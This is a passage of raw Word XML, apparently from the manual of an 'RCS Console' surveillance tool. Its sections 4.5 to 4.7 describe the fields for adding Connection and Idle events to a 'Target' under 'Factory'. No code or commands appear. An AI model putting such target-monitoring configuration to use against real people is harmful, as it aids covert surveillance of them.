          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Desktop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Event</w:t>
      </w:r>
      <w:r w:rsidR="0098176A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00476149" w:rsidRDefault="00476149" w:rsidP="00476149">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283"/>
        <w:gridCol w:w="5522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00476149" w:rsidTr="00656D64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00656D64" w:rsidRDefault="00656D64" w:rsidP="00476149">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00656D64" w:rsidRDefault="0010013A" w:rsidP="00656D64">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.5</w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00476149" w:rsidRPr="00A52C9B" w:rsidRDefault="00656D64" w:rsidP="00656D64">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(Connection)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1086" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:183.1pt;height:234.1pt;z-index:251724800;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId97" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1086" DrawAspect="Content" ObjectID="_1446455351" r:id="rId98"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00476149" w:rsidRDefault="00476149" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00476149" w:rsidRPr="00240B6F" w:rsidRDefault="00476149" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00476149" w:rsidRPr="00240B6F" w:rsidRDefault="00476149" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00854CDA" w:rsidRPr="00240B6F" w:rsidRDefault="00854CDA" w:rsidP="00854CDA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the Event is active or not. If an Event is not enabled no connected Actions will be called.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00476149" w:rsidRPr="00240B6F" w:rsidRDefault="00476149" w:rsidP="0029750F">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Event’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00476149" w:rsidRPr="00240B6F" w:rsidRDefault="00476149" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00476149" w:rsidRPr="00240B6F" w:rsidRDefault="00476149" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00854CDA" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="003D684B" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the address of the host that you want to detect through the Connection Event.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00854CDA" w:rsidRPr="00240B6F" w:rsidRDefault="00854CDA" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Netmask</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="003D684B" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the netmask of the host that you want to detect through the Connection Event.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00476149" w:rsidRPr="00240B6F" w:rsidRDefault="00854CDA" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="003D684B" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the port of the host that you want to detect through the Connection Event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D86157" w:rsidRDefault="00D86157" w:rsidP="00D86157">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00656D64" w:rsidRDefault="00656D64" w:rsidP="00D86157">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283"/>
        <w:gridCol w:w="5522"/>
      </w:tblGrid>
      <w:tr w:rsidR="00656D64" w:rsidTr="00656D64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00656D64" w:rsidRDefault="00656D64" w:rsidP="00494B58">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00656D64" w:rsidRDefault="0010013A" w:rsidP="00494B58">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.6</w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00656D64" w:rsidRPr="00A52C9B" w:rsidRDefault="003A4380" w:rsidP="00656D64">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1229" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:183.4pt;height:189.75pt;z-index:251822080;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId99" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1229" DrawAspect="Content" ObjectID="_1446455352" r:id="rId100"/>
              </w:object>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Target #</w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Factory</w:t>
            </w:r>
            <w:r w:rsidR="00656D64" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> #</w:t>
            </w:r>
            <w:r w:rsidR="00656D64">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; Add Event (Idle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00656D64" w:rsidRDefault="00656D64" w:rsidP="00494B58">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00656D64" w:rsidRPr="00240B6F" w:rsidRDefault="00656D64" w:rsidP="00494B58">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00656D64" w:rsidRPr="00240B6F" w:rsidRDefault="00656D64" w:rsidP="00494B58">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00656D64" w:rsidRPr="00240B6F" w:rsidRDefault="00656D64" w:rsidP="00656D64">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the Event is active or not. If an Event is not enabled no connected Actions will be called.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00656D64" w:rsidRPr="00240B6F" w:rsidRDefault="00656D64" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Event’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00656D64" w:rsidRPr="00240B6F" w:rsidRDefault="00656D64" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify which type of Event you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00656D64" w:rsidRPr="00240B6F" w:rsidRDefault="00656D64" w:rsidP="00494B58">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Time</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the timeframe that must pass before the Idle Event is triggered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="00D86157">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>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104CC3" w:rsidTr="00F64671">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00104CC3" w:rsidRDefault="003A4380" w:rsidP="00F64671">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1509" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:228pt;z-index:251883520;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId101" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1509" DrawAspect="Content" ObjectID="_1446455353" r:id="rId102"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00104CC3" w:rsidRDefault="0010013A" w:rsidP="00104CC3">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.7</w:t>
            </w:r>
            <w:r w:rsidR="00104CC3">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00104CC3" w:rsidRPr="00957E2D">
              <w:rPr>
